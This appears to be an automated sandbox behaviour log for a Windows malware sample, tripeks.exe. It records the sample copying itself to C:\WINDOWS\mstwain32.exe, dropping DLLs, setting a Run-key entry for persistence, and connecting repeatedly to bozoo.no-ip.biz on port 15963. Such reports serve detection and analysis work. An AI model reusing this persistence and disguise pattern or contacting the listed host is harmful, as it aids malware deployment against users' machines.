HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
File Changes by all processes

New Files:
c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd

Opened Files:
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
C:\WINDOWS\VMPipe32.dll
C:\WINDOWS\mstwain32.exe
\\.\PIPE\wkssvc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\

Deleted Files:

Chronological Order:
Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963 (repeated 11 times)
Registry Changes by all processes

Create or Open:

Changes:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe

Reads:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
File Changes by all processes
New Files
c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd
Opened Files
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
C:\WINDOWS\mstwain32.exe
\\.\PIPE\wkssvc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
Deleted Files
Chronological Order
Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
